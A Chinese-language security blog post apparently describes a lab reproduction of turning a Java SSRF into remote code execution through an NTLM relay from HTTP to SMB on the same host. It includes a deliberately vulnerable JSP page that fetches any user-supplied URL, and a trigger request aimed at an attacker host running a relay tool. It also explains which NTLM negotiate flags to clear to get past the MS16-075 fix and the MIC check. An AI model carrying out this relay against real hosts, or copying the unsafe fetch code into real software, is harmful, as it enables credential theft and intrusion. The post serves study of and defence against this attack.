Using Java's SSRF vulnerability rce via ntlm relay

环境搭建

实验室环境说明
• 6.1.7601 Service Pack 1 Build 7601
• jdk1.7.0_80
• 工作组环境

实验代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<%@ page import="java.io.BufferedReader" %>
<%@ page import="java.io.IOException" %>
<%@ page import="java.io.InputStreamReader" %>
<%@ page import="java.net.URL" %>
<%@ page import="java.net.URLConnection" %>
<%
String ssrf = request.getParameter("ssrf");
URL url = new URL(ssrf);
URLConnection connection = url.openConnection();
connection.setRequestProperty("user-agent", "javasec");
connection.setConnectTimeout(1000);
connection.setReadTimeout(1000);
connection.connect();
connection.getHeaderFields();
connection.getInputStream();
StringBuilder resp = new StringBuilder();
BufferedReader in = new BufferedReader(
new InputStreamReader(connection.getInputStream()));
String line;
while ((line = in.readLine()) != null) {
resp.append("/n").append(line);
}
System.out.print(resp.toString());
%>

漏洞复现

使用ultrarelay监听端口,访问url http://172.16.247.130:8888/ssrf.jsp?ssrf=http://172.16.247.1触发ssrf漏洞时可以看到已经把受害机的ntlm hash拿到了。
Alt text

原理分析

本质上就是一次从http到smb跨协议ntlm relay本机,但是我们知道在 MS16-075之后微软修复了http->smb的本机relay。所以为了绕过这个限制需要将type2(NTLMSSP_CHALLENGE)Negotiate Flags中的0x00004000设置为0,但是设置为0后会出现另外一个问题那就是MIC验证会不通过,为了绕过这个限制又需要把type2 Negotiate Flags中的Negotiate Always Sign设置为0。

响应victim401并开启ntlm认证
Alt text

victom -> http NTLMSSP_NEGOTIATE -> hacker
Alt text

hacker -> smb NTLMSSP_NEGOTIATE -> victim
Alt text

victim->smb NTLMSSP_CHALLENGE -> hacker
Alt text

hacker->http NTLMSSP_CHALLENGE -> victim,重点就在这步在给victim的http应答中将0x00004000和Negotiate Always Sign都设置为了0。
Alt text

victim-> http NTLMSSP_AUTH ->hacker
Alt text

hacker-> smb NTLMSSP_AUTH ->victim
Alt text

后面认证成功后,响应victim 404,并连接victim的IPC$进行后续rce操作。
Alt text

成功条件

• http->smb未打新补丁
• 工作条件环境下需要administrator(sid 500)
• 一个ssrf或者xxe的点

参考

Ntlm Relay is dead, Long Live Ntlm Relay
Ntlm-Relay-Reloaded-Attack-methods-you-do-not-know
ntlmrelay

Author

李三(cl0und)

Posted on

2019-12-19

Updated on

2020-07-11

Licensed under